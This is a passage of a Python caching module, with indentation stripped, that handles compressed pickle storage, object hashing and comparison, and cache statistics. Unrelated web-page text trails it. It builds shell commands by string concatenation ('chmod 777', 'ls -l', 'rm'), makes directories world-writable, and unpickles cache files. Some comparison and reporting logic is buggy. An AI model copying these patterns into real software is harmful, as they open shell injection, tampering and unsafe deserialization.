file = open(FN+'.z','r')
file.close()
new_file = 0
except:
try:
file = open(FN,'r')
file.close()
new_file = 0
except:
new_file = 1
else:
new_file = 0 #Assume it exists if mode was not 'w'
compressed = 0
if compression:
try:
file = open(FN+'.z',mode)
compressed = 1
except:
try:
file = open(FN,mode)
except:
file = None
else:
try:
file = open(FN,mode)
except:
try:
file = open(FN+'.z',mode)
compressed = 1
except:
file = None
# Now set access rights if it is a new file
#
if file and new_file:
if unix:
exitcode=os.system('chmod 666 '+file.name)
else:
pass # FIXME: Take care of access rights under Windows
return(file, compressed)
# -----------------------------------------------------------------------------
def myload(file, compressed):
"""Load data from file
USAGE:
myload(file, compressed)
"""
reason = 0
try:
if compressed:
import zlib
RsC = file.read()
try:
Rs = zlib.decompress(RsC)
except:
# File "./caching.py", line 1032, in load_from_cache
# T = myload(datafile,compressed)
# File "./caching.py", line 1124, in myload
# Rs = zlib.decompress(RsC)
# zlib.error: Error -5 while decompressing data
#raise Exception
reason = 6 # Unreadable file
return None, reason
del RsC # Free up some space
R = pickler.loads(Rs)
else:
try:
R = pickler.load(file)
#except EOFError, e:
except:
#Catch e.g., file with 0 length or corrupted
reason = 6 # Unreadable file
return None, reason
except MemoryError:
if options['verbose']:
log.critical('ERROR: Out of memory while loading %s, aborting'
% file.name)
# Raise the error again for now
#
raise MemoryError
return R, reason
# -----------------------------------------------------------------------------
def mysave(T, file, compression):
"""Save data T to file
USAGE:
mysave(T, file, compression)
"""
bin = options['bin']
if compression:
try:
import zlib
except:
log.critical()
log.critical('*** Could not find zlib ***')
log.critical('*** Try to run caching with compression off ***')
log.critical("*** caching.set_option('compression', 0) ***")
raise Exception
try:
Ts = pickler.dumps(T, bin)
except MemoryError:
msg = '****WARNING (caching.py): Could not pickle data for compression.'
msg += ' Try using compression = False'
raise MemoryError(msg)
else:
# Compressed pickling
TsC = zlib.compress(Ts, comp_level)
file.write(TsC)
else:
# Uncompressed pickling
pickler.dump(T, file, bin)
# FIXME: This may not work on Windoze network drives.
# The error msg is IOError: [Errno 22] Invalid argument
# Testing with small files was OK, though.
# I think this is an OS problem.
# Excerpt from http://www.ultraseek.com/support/faqs/4173.html
# The error is caused when there is a problem with server disk access (I/0). This happens at the OS level, and there is no controlling these errors through the Ultraseek application.
#
#Ultraseek contains an embedded Python interpreter. The exception "exceptions.IOError: [Errno 22] Invalid argument" is generated by the Python interpreter. The exception is thrown when a disk access operation fails due to an I/O-related reason.
#
#The following extract is taken from the site http://www.python.org:
#
#---------------------------------------------------------------------------------------------
#exception IOError
#Raised when an I/O operation (such as a print statement, the built-in open() function or a method of a file object) fails for an I/O-related reason, e.g., ``file not found'' or ``disk full''.
#This class is derived from EnvironmentError. See the discussion above for more information on exception instance attributes.
#---------------------------------------------------------------------------------------------
#
#The error code(s) that accompany exceptions are described at:
#http://www.python.org/dev/doc/devel//lib/module-errno.html
#
#You can view several postings on this error message by going to http://www.python.org, and typing the below into the search box:
#
#exceptions.IOError invalid argument Errno 22
#try:
# pickler.dump(T,file,bin)
#except IOError, e:
# print e
# msg = 'Could not store to %s, bin=%s' %(file, bin)
# raise Exception(msg)
# -----------------------------------------------------------------------------
def myhash(T, ids=None):
"""Compute hashed integer from a range of inputs.
If T is not hashable being e.g. a tuple T, myhash will recursively
hash the values individually
USAGE:
myhash(T)
ARGUMENTS:
T -- Anything
"""
# Replacing Python2: if type(T) in [TupleType, ListType, DictType, InstanceType]:
if isinstance(T, (tuple, list, dict)) or type(T) is type:
# Keep track of unique id's to protect against infinite recursion
if ids is None: ids = []
# Check if T has already been encountered
i = id(T)
if i in ids:
return 0 # T has been hashed already
else:
ids.append(i)
# Start hashing
# On some architectures None, False and True gets different hash values
if T is None:
return(-1)
if T is False:
return(0)
if T is True:
return(1)
# Get hash values for hashable entries
if isinstance(T, (tuple, list)):
#print('LIST or TUPLE', T)
hvals = ''
for t in T:
h = myhash(t, ids)
hvals += str(h)
val = hash(hvals)
elif isinstance(T, dict):
#print('DICT')
I = list(T.items())
if system_tools.major_version == 2:
# Make dictionary ordering unique
I.sort()
else:
# As of Python 3.7 they now are ordered: https://mail.python.org/pipermail/python-dev/2017-December/151283.html
pass
val = myhash(I, ids)
elif isinstance(T, num.ndarray):
#print('NUM')
T = num.array(T) # Ensure array is contiguous
# Use mean value for efficiency
val = hash(num.average(T.flat))
elif callable(T):
#print('CALLABLE')
I = myhash(T.__dict__, ids)
val = myhash(I, ids)
elif type(T) is type: #isinstance(T, object): # This is instead of the old InstanceType:
#elif isinstance(T, object): # This is instead of the old InstanceType:
#print('OBJECT', T, dir(T), type(T))
# Use the attribute values
val = myhash(T.__dict__, ids)
else:
# This must be a simple Python type that should hash without problems
#print('ALL', T, type(T))
val = hash(str(T))
#print(ids, val)
return(val)
def compare(A, B, ids=None):
"""Safe comparison of general objects
USAGE:
compare(A,B)
DESCRIPTION:
Return 1 if A and B they are identical, 0 otherwise
"""
# Keep track of unique id's to protect against infinite recursion
if ids is None: ids = {}
# Check if T has already been encountered
iA = id(A)
iB = id(B)
if (iA, iB) in ids:
# A and B have been compared already
return ids[(iA, iB)]
else:
ids[(iA, iB)] = True
# Check if arguments are of same type
if type(A) != type(B):
return False
# Compare recursively based on argument type
if isinstance(A, (tuple, list)):
N = len(A)
if len(B) != N:
identical = False
else:
identical = True
for i in range(N):
if not compare(A[i], B[i], ids):
identical = False; break
elif isinstance(A, dict):
if len(A) != len(B):
identical = False
else:
# Dictionaries are now ordered as of Python 3.7
# Make dictionary ordering unique
#a = list(A.items()); a.sort()
#b = list(B.items()); b.sort()
identical = compare(A, B, ids)
elif isinstance(A, num.ndarray):
# Use element by element comparison
identical = num.alltrue(A==B)
#elif type(A) == types.InstanceType:
elif type(A) is type:
# Take care of special case where elements are instances
# Base comparison on attributes
identical = compare(A.__dict__,
B.__dict__,
ids)
else:
# Fall back to general code
try:
identical = (A == B)
except:
import pickle
# Use pickle to compare data
# The native pickler must be used
# since the faster cPickle does not
# guarantee a unique translation
# FIXME (Ole): Try to fall back on the dill pickler
try:
identical = (pickle.dumps(A,0) == pickle.dumps(B,0))
except:
identical = False
# Record result of comparison and return
ids[(iA, iB)] = identical
return(identical)
# -----------------------------------------------------------------------------
def nospace(s):
"""Replace spaces in string s with underscores
USAGE:
nospace(s)
ARGUMENTS:
s -- string
"""
import string
newstr = ''
for i in range(len(s)):
if s[i] == ' ':
newstr = newstr+'_'
else:
newstr = newstr+s[i]
return(newstr)
# -----------------------------------------------------------------------------
def get_funcname(my_F):
"""Retrieve name of function object func (depending on its type)
USAGE:
get_funcname(my_F)
"""
import string
if type(my_F) == types.FunctionType:
funcname = my_F.__name__
elif type(my_F) == types.BuiltinFunctionType:
funcname = my_F.__name__
else:
if system_tools.major_version == 3:
tab = str.maketrans("<>'"," ")
tmp = str.translate(repr(my_F), tab)
tmp = str.split(tmp)
elif system_tools.major_version == 2:
tab = string.maketrans("<>'"," ")
tmp = string.translate(repr(my_F), tab)
tmp = string.split(tmp)
else:
raise Exception('Unsupported version: %' % system_tools.version)
funcname = ' '.join(tmp)
# Truncate memory address as in
# class __main__.Dummy at 0x00A915D0
index = funcname.find('at 0x')
if index >= 0:
funcname = funcname[:index+5] # Keep info that there is an address
funcname = nospace(funcname)
return(funcname)
# -----------------------------------------------------------------------------
def get_bytecode(my_F):
""" Get bytecode and associated values from function object.
It is assumed that my_F is callable and there either
a function
a class
a method
a callable object
or a builtin function
USAGE:
get_bytecode(my_F)
"""
if type(my_F) == types.FunctionType:
# Function
return get_func_code_details(my_F)
elif type(my_F) == types.MethodType:
# Method
return get_func_code_details(my_F.__func__)
elif type(my_F) in [types.BuiltinFunctionType, types.BuiltinMethodType]:
# Built-in functions are assumed not to change
return None, 0, 0, 0
elif inspect.isclass(my_F):
return get_func_code_details(my_F.__init__)
elif hasattr(my_F, '__call__'):
bytecode = get_func_code_details(my_F.__call__.__func__)
# Add hash value of object to detect attribute changes
return bytecode + (myhash(my_F),)
else:
msg = 'Unknown function type: %s' % type(my_F)
raise Exception(msg)
def get_func_code_details(my_F):
"""Extract co_code, co_consts, co_argcount, func_defaults
"""
bytecode = my_F.__code__.co_code
consts = my_F.__code__.co_consts
argcount = my_F.__code__.co_argcount
defaults = my_F.__defaults__
return bytecode, consts, argcount, defaults
# -----------------------------------------------------------------------------
def get_depstats(dependencies):
""" Build dictionary of dependency files and their size, mod. time and ctime.
USAGE:
get_depstats(dependencies):
"""
d = {}
if dependencies:
#Expand any wildcards
import glob
expanded_dependencies = []
for FN in dependencies:
expanded_FN = glob.glob(FN)
if expanded_FN == []:
errmsg = 'ERROR (caching.py): Dependency '+FN+' does not exist.'
raise Exception(errmsg)
expanded_dependencies += expanded_FN
for FN in expanded_dependencies:
if not isinstance(FN, basestring):
errmsg = 'ERROR (caching.py): Dependency must be a string.\n'
errmsg += ' Dependency given: %s' %FN
raise Exception(errmsg)
if not os.access(FN,os.F_OK):
errmsg = 'ERROR (caching.py): Dependency '+FN+' does not exist.'
raise Exception(errmsg)
(size,atime,mtime,ctime) = filestat(FN)
# We don't use atime because that would cause recomputation every time.
# We don't use ctime because that is irrelevant and confusing for users.
d.update({FN : (size,mtime)})
return(d)
# -----------------------------------------------------------------------------
def filestat(FN):
"""A safe wrapper using os.stat to get basic file statistics
The built-in os.stat breaks down if file sizes are too large (> 2GB ?)
USAGE:
filestat(FN)
DESCRIPTION:
Must compile Python with
CFLAGS="`getconf LFS_CFLAGS`" OPT="-g -O2 $CFLAGS" \
configure
as given in section 8.1.1 Large File Support in the Libray Reference
"""
import os, time
try:
stats = os.stat(FN)
size = stats[6]
atime = stats[7]
mtime = stats[8]
ctime = stats[9]
except:
# Hack to get the results anyway (works only on Unix at the moment)
#
log.critical('Hack to get os.stat when files are too large')
if unix:
tmp = '/tmp/cach.tmp.'+repr(time.time())+repr(os.getpid())
# Unique filename, FIXME: Use random number
# Get size and access time (atime)
#
exitcode=os.system('ls -l --full-time --time=atime '+FN+' > '+tmp)
(size,atime) = get_lsline(tmp)
# Get size and modification time (mtime)
#
exitcode=os.system('ls -l --full-time '+FN+' > '+tmp)
(size,mtime) = get_lsline(tmp)
# Get size and ctime
#
exitcode=os.system('ls -l --full-time --time=ctime '+FN+' > '+tmp)
(size,ctime) = get_lsline(tmp)
try:
exitcode=os.system('rm '+tmp)
# FIXME: Gives error if file doesn't exist
except:
pass
else:
pass
raise Exception # FIXME: Windows case
return(int(size),atime,mtime,ctime)
# -----------------------------------------------------------------------------
def get_lsline(FN):
"""get size and time for filename
USAGE:
get_lsline(file_name)
DESCRIPTION:
Read in one line 'ls -la' item from file (generated by filestat) and
convert time to seconds since epoch. Return file size and time.
"""
import string, time
f = open(FN,'r')
info = f.read()
info = string.split(info)
size = info[4]
week = info[5]
mon = info[6]
day = info[7]
hour = info[8]
year = info[9]
str = week+' '+mon+' '+day+' '+hour+' '+year
timetup = time.strptime(str)
t = time.mktime(timetup)
return(size, t)
# -----------------------------------------------------------------------------
def checkdir(CD, verbose=None, warn=False):
"""Check or create caching directory
USAGE:
checkdir(CD,verbose):
ARGUMENTS:
CD -- Directory
verbose -- Flag verbose output (default: None)
DESCRIPTION:
If CD does not exist it will be created if possible
"""
import os
import os.path
if CD[-1] != os.sep:
CD = CD + os.sep # Add separator for directories
CD = os.path.expanduser(CD) # Expand ~ or ~user in pathname
if not (os.access(CD,os.R_OK and os.W_OK) or CD == ''):
try:
exitcode=os.mkdir(CD)
# Change access rights if possible
#
if unix:
exitcode=os.system('chmod 777 '+CD)
else:
pass # FIXME: What about acces rights under Windows?
if verbose: log.critical('MESSAGE: Directory %s created.' % CD)
except:
if warn is True:
log.critical('WARNING: Directory %s could not be created.' % CD)
if unix:
CD = '/tmp/'
else:
CD = 'C:'
if warn is True:
log.critical('Using directory %s instead' % CD)
return(CD)
checkdir(cachedir, warn=True)
#==============================================================================
# Statistics
#==============================================================================
def addstatsline(CD, funcname, FN, Retrieved, reason, comptime, loadtime,
compression):
"""Add stats entry
USAGE:
addstatsline(CD,funcname,FN,Retrieved,reason,comptime,loadtime,compression)
DESCRIPTION:
Make one entry in the stats file about one cache hit recording time saved
and other statistics. The data are used by the function cachestat.
"""
import os, time
try:
TimeTuple = time.localtime(time.time())
extension = time.strftime('%b%Y',TimeTuple)
SFN = CD+statsfile+'.'+extension
#statfile = open(SFN,'a')
(statfile, dummy) = myopen(SFN,'a',compression=0)
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+SFN)
# except:
# pass
except:
log.critical('Warning: Stat file could not be opened')
try:
if 'USER' in os.environ:
user = os.environ['USER']
else:
user = 'Nobody'
date = time.asctime(TimeTuple)
if Retrieved:
hit = '1'
else:
hit = '0'
# Get size of result file
#
if compression:
stats = os.stat(CD+FN+'_'+file_types[0]+'.z')
else:
stats = os.stat(CD+FN+'_'+file_types[0])
if stats:
size = stats[6]
else:
size = -1 # Error condition, but don't crash. This is just statistics
# Build entry
#
entry = date + ',' +\
user + ',' +\
FN + ',' +\
str(int(size)) + ',' +\
str(compression) + ',' +\
hit + ',' +\
str(reason) + ',' +\
str(round(comptime,4)) + ',' +\
str(round(loadtime,4)) +\
CR
statfile.write(entry)
statfile.close()
except:
log.critical('Warning: Writing of stat file failed')
# -----------------------------------------------------------------------------
# FIXME: should take cachedir as an optional arg
#
def __cachestat(sortidx=4, period=-1, showuser=None, cachedir=None):
""" List caching statistics.
USAGE:
__cachestat(sortidx=4,period=-1,showuser=None,cachedir=None):
Generate statistics of caching efficiency.
The parameter sortidx determines by what field lists are sorted.
If the optional keyword period is set to -1,
all available caching history is used.
If it is 0 only the current month is used.
Future versions will include more than one month....
OMN 20/8/2000
"""
import os
import os.path
from string import split, rstrip, find
from time import strptime, localtime, strftime, mktime, ctime
# sortidx = 4 # Index into Fields[1:]. What to sort by.
Fields = ['Name', 'Hits', 'Exec(s)', \
'Cache(s)', 'Saved(s)', 'Gain(%)', 'Size']
Widths = [25,7,9,9,9,9,13]
#Types = ['s','d','d','d','d','.2f','d']
Types = ['s','d','.2f','.2f','.2f','.2f','d']
Dictnames = ['Function', 'User']
if not cachedir:
cachedir = checkdir(options['cachedir'])
SD = os.path.expanduser(cachedir) # Expand ~ or ~user in pathname
if period == -1: # Take all available stats
SFILENAME = statsfile
else: # Only stats from current month
# MAKE THIS MORE GENERAL SO period > 0 counts several months backwards!
TimeTuple = localtime(time())
extension = strftime('%b%Y',TimeTuple)
SFILENAME = statsfile+'.'+extension
DIRLIST = os.listdir(SD)
SF = []
for FN in DIRLIST:
if find(FN,SFILENAME) >= 0:
SF.append(FN)
blocksize = 15000000
total_read = 0
total_hits = 0
total_discarded = 0
firstday = mktime(strptime('2030','%Y'))
# FIXME: strptime don't exist in WINDOWS ?
lastday = 0
FuncDict = {}
UserDict = {}
for FN in SF:
input = open(SD+FN,'r')
log.critical('Reading file %s' % SD+FN)
while True:
A = input.readlines(blocksize)
if len(A) == 0: break
total_read = total_read + len(A)
for record in A:
record = tuple(split(rstrip(record),','))
if len(record) == 9:
timestamp = record[0]
try:
t = mktime(strptime(timestamp))
except:
total_discarded = total_discarded + 1
continue
if t > lastday:
lastday = t
if t < firstday:
firstday = t
user = record[1]
my_F = record[2]
# Strip hash-stamp off
#
i = find(my_F,'[')
my_F = my_F[:i]
size = float(record[3])
# Compression kepword can be Boolean
if record[4] in ['True', '1']:
compression = 1
elif record[4] in ['False', '0']:
compression = 0
else:
log.critical('Unknown value of compression %s' % str(record[4]))
log.critical(str(record))
total_discarded = total_discarded + 1
continue
#compression = int(record[4]) # Can be Boolean
hit = int(record[5])
reason = int(record[6]) # Not used here
cputime = float(record[7])
loadtime = float(record[8])
if hit:
total_hits = total_hits + 1
saving = cputime-loadtime
if cputime != 0:
rel_saving = round(old_div(100.0*saving,cputime),2)
else:
#rel_saving = round(1.0*saving,2)
rel_saving = 100.0 - round(1.0*saving,2) # A bit of a hack
info = [1,cputime,loadtime,saving,rel_saving,size]
UpdateDict(UserDict,user,info)
UpdateDict(FuncDict,my_F,info)
else:
pass #Stats on recomputations and their reasons could go in here
else:
total_discarded = total_discarded + 1
input.close()
# Compute averages of all sums and write list
#
if total_read == 0:
printline(Widths,'=')
log.critical('CACHING STATISTICS: No valid records read')
printline(Widths,'=')
return
log.critical()
printline(Widths,'=')
log.critical('CACHING STATISTICS: '+ctime(firstday)+' to '+ctime(lastday))
printline(Widths,'=')
log.critical(' Total number of valid records %d' % total_read)
log.critical(' Total number of discarded records %d' % total_discarded)
log.critical(' Total number of hits %d' % total_hits)
log.critical()
log.critical(' Fields %s are averaged over number of hits' % Fields[2:])
log.critical(' Time is measured in seconds and size in bytes')
log.critical(' Tables are sorted by %s' % Fields[1:][sortidx])
if showuser:
Dictionaries = [FuncDict, UserDict]
else:
Dictionaries = [FuncDict]
i = 0
for Dict in Dictionaries:
for key in list(Dict.keys()):
rec = Dict[key]
for n in range(len(rec)):
if n > 0:
rec[n] = round(old_div(1.0*rec[n],rec[0]),2)
Dict[key] = rec
# Sort and output
#
keylist = SortDict(Dict,sortidx)
# Write Header
#
log.critical()
printline(Widths,'-')
n = 0
for s in Fields:
if s == Fields[0]: # Left justify
s = Dictnames[i] + ' ' + s; i=i+1
#exec "print '%-" + str(Widths[n]) + "s'%s,"; n=n+1
log.critical('%-*s' % (Widths[n], s))
n += 1
else:
#exec "print '%" + str(Widths[n]) + "s'%s,"; n=n+1
log.critical('%*s' % (Widths[n], s))
n += 1
log.critical()
printline(Widths,'-')
# Output Values
#
for key in keylist:
rec = Dict[key]
n = 0
if len(key) > Widths[n]: key = key[:Widths[n]-3] + '...'
#exec "print '%-" + str(Widths[n]) + Types[n]+"'%key,";n=n+1
log.critical('%-*s' % (Widths[n], str(key)))
n += 1
for val in rec:
#exec "print '%" + str(Widths[n]) + Types[n]+"'%val,"; n=n+1
log.critical('%*s' % (Widths[n], str(key)))
n += 1
log.critical()
log.critical()
#==============================================================================
# Auxiliary stats functions
#==============================================================================
def UpdateDict(Dict, key, info):
"""Update dictionary by adding new values to existing.
USAGE:
UpdateDict(Dict,key,info)
"""
if key in Dict:
dinfo = Dict[key]
for n in range(len(dinfo)):
dinfo[n] = info[n] + dinfo[n]
else:
dinfo = info[:] # Make a copy of info list
Dict[key] = dinfo
return Dict
# -----------------------------------------------------------------------------
def SortDict(Dict, sortidx=0):
"""Sort dictionary
USAGE:
SortDict(Dict,sortidx):
DESCRIPTION:
Sort dictionary of lists according field number 'sortidx'
"""
sortlist = []
keylist = list(Dict.keys())
for key in keylist:
rec = Dict[key]
if not isinstance(rec, (list, tuple)):
rec = [rec]
if sortidx > len(rec)-1:
msg = 'ERROR: Sorting index too large, sortidx = %s' % str(sortidx)
raise IndexError(msg)
val = rec[sortidx]
sortlist.append(val)
A = list(zip(sortlist,keylist))
A.sort()
keylist = [x[1] for x in A] # keylist sorted by sortidx
return(keylist)
# -----------------------------------------------------------------------------
def printline(Widths,char):
"""Print textline in fixed field.
USAGE:
printline(Widths,char)
"""
s = ''
for n in range(len(Widths)):
s = s+Widths[n]*char
if n > 0:
s = s+char
log.critical(s)
#==============================================================================
# Messages
#==============================================================================
def msg1(funcname, args, kwargs, reason):
"""Message 1
USAGE:
msg1(funcname, args, kwargs, reason):
"""
import string
print_header_box('Evaluating function %s' %funcname)
msg7(args, kwargs)
msg8(reason)
print_footer()
# -----------------------------------------------------------------------------
def msg2(funcname, args, kwargs, comptime, reason):
"""Message 2
USAGE:
msg2(funcname, args, kwargs, comptime, reason)
"""
import string
#try:
# R = Reason_msg[reason]
#except:
# R = 'Unknown reason'
#print_header_box('Caching statistics (storing) - %s' %R)
print_header_box('Caching statistics (storing)')
msg6(funcname,args,kwargs)
msg8(reason)
log.critical(str.ljust('| CPU time:', textwidth1) +
str(round(comptime,2)) + ' seconds')
# -----------------------------------------------------------------------------
def msg3(savetime, CD, FN, deps, compression):
"""Message 3
USAGE:
msg3(savetime, CD, FN, deps, compression)
"""
import string
log.critical(str.ljust('| Loading time:', textwidth1) +
str(round(savetime,2)) + ' seconds (estimated)')
msg5(CD,FN,deps,compression)
# -----------------------------------------------------------------------------
def msg4(funcname, args, kwargs, deps, comptime, loadtime, CD, FN, compression):
"""Message 4
USAGE:
msg4(funcname, args, kwargs, deps, comptime, loadtime, CD, FN, compression)
"""
import string
print_header_box('Caching statistics (retrieving)')
msg6(funcname,args,kwargs)
log.critical(str.ljust('| CPU time:', textwidth1) +
str(round(comptime,2)) + ' seconds')
log.critical(str.ljust('| Loading time:', textwidth1) +
str(round(loadtime,2)) + ' seconds')
log.critical(str.ljust('| Time saved:', textwidth1) +
str(round(comptime-loadtime,2)) + ' seconds')
msg5(CD,FN,deps,compression)
# -----------------------------------------------------------------------------
def msg5(CD, FN, deps, compression):
"""Message 5
USAGE:
msg5(CD, FN, deps, compression)
DESCRIPTION:
Print dependency stats. Used by msg3 and msg4
"""
import os, time, string
log.critical('|')
log.critical(str.ljust('| Caching dir: ', textwidth1) + CD)
if compression:
suffix = '.z'
bytetext = 'bytes, compressed'
else:
suffix = ''
bytetext = 'bytes'
for file_type in file_types:
file_name = FN + '_' + file_type + suffix
stats = os.stat(CD+file_name)
log.critical(str.ljust('| ' + file_type + ' file: ', textwidth1) +
file_name + '('+ str(stats[6]) + ' ' + bytetext + ')')
log.critical('|')
if len(deps) > 0:
log.critical('| Dependencies: ')
dependencies = list(deps.keys())
dlist = []; maxd = 0
tlist = []; maxt = 0
slist = []; maxs = 0
for d in dependencies:
stats = deps[d]
t = time.ctime(stats[1])
s = str(stats[0])
#if s[-1] == 'L':
# s = s[:-1] # Strip rightmost 'long integer' L off.
# # FIXME: Unnecessary in versions later than 1.5.2
if len(d) > maxd: maxd = len(d)
if len(t) > maxt: maxt = len(t)
if len(s) > maxs: maxs = len(s)
dlist.append(d)
tlist.append(t)
slist.append(s)
for n in range(len(dlist)):
d = str.ljust(dlist[n]+':', maxd+1)
t = str.ljust(tlist[n], maxt)
s = str.rjust(slist[n], maxs)
log.critical('| %s %s %s bytes' % (d, t, s))
else:
log.critical('| No dependencies')
print_footer()
# -----------------------------------------------------------------------------
def msg6(funcname, args, kwargs):
"""Message 6
USAGE:
msg6(funcname, args, kwargs)
"""
import string
log.critical(str.ljust('| Function:', textwidth1) + funcname)
msg7(args, kwargs)
# -----------------------------------------------------------------------------
def msg7(args, kwargs):
"""Message 7
USAGE:
msg7(args, kwargs):
"""
import string
args_present = 0
if args:
if len(args) == 1:
log.critical(str.ljust('| Argument:', textwidth1) +
mkargstr(args[0], textwidth2))
else:
log.critical(str.ljust('| Arguments:', textwidth1) +
mkargstr(args, textwidth2))
args_present = 1
if kwargs:
if len(kwargs) == 1:
log.critical(str.ljust('| Keyword Arg:', textwidth1) +
mkargstr(kwargs, textwidth2))
else:
log.critical(str.ljust('| Keyword Args:', textwidth1) +
mkargstr(kwargs, textwidth2))
args_present = 1
if not args_present:
log.critical('| No arguments') # Default if no args or kwargs present
# -----------------------------------------------------------------------------
def msg8(reason):
"""Message 8
USAGE:
msg8(reason):
"""
import string
try:
R = Reason_msg[reason]
except:
R = 'Unknown'
log.critical(str.ljust('| Reason:', textwidth1) + R)
# -----------------------------------------------------------------------------
def print_header_box(line):
"""Print line in a nice box.
USAGE:
print_header_box(line)
"""
global textwidth3
import time
time_stamp = time.ctime(time.time())
line = time_stamp + '. ' + line
N = len(line) + 1
s = '+' + '-'*N + CR
log.critical(s + '| ' + line + CR + s)
textwidth3 = N
# -----------------------------------------------------------------------------
def print_footer():
"""Print line same width as that of print_header_box.
"""
N = textwidth3
s = '+' + '-'*N + CR
log.critical(s)
# -----------------------------------------------------------------------------
def mkargstr(args, textwidth, argstr = '', level=0):
""" Generate a string containing first textwidth characters of arguments.
USAGE:
mkargstr(args, textwidth, argstr = '', level=0)
DESCRIPTION:
Exactly the same as str(args) possibly followed by truncation,
but faster if args is huge.
"""
if level > 10:
# Protect against circular structures
return '...'
WasTruncated = 0
if not isinstance(args, (tuple, list, dict)):
if isinstance(args, basestring):
argstr = argstr + "'"+str(args)+"'"
else:
# Truncate large numeric arrays before using str()
if isinstance(args, num.ndarray):
# if len(args.flat) > textwidth:
# Changed by Duncan and Nick 21/2/07 .flat has problems with
# non-contigous arrays and ravel is equal to .flat except it
# can work with non-contiguous arrays
if len(num.ravel(args)) > textwidth:
args = 'Array: ' + str(args.shape)
argstr = argstr + str(args)
else:
if isinstance(args, dict):
argstr = argstr + "{"
for key in list(args.keys()):
argstr = argstr + mkargstr(key, textwidth, level=level+1) + ": " + \
mkargstr(args[key], textwidth, level=level+1) + ", "
if len(argstr) > textwidth:
WasTruncated = 1
break
argstr = argstr[:-2] # Strip off trailing comma
argstr = argstr + "}"
else:
if isinstance(args, tuple):
lc = '('
rc = ')'
else:
lc = '['
rc = ']'
argstr = argstr + lc
for arg in args:
argstr = argstr + mkargstr(arg, textwidth, level=level+1) + ', '
if len(argstr) > textwidth:
WasTruncated = 1
break
# Strip off trailing comma and space unless singleton tuple
#
if isinstance(args, tuple) and len(args) == 1:
argstr = argstr[:-1]
else:
argstr = argstr[:-2]
argstr = argstr + rc
if len(argstr) > textwidth:
WasTruncated = 1
if WasTruncated:
argstr = argstr[:textwidth]+'...'
return(argstr)
# -----------------------------------------------------------------------------
def logtestOK(msg):
"""Print OK msg if test is OK.
USAGE
logtestOK(message)
"""
import string
log.critical(str.ljust(msg, textwidth4) + ' - OK' )
#raise StandardError
# -----------------------------------------------------------------------------
def logtesterror(msg):
"""Print error if test fails.
USAGE
logtesterror(message)
"""
log.critical('ERROR (caching.test): %s' % msg)
log.critical('Please send this code example and output to ')
log.critical('<EMAIL>')
log.critical()
log.critical()
raise Exception
#-------------------------------------------------------------
if __name__ == "__main__":
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.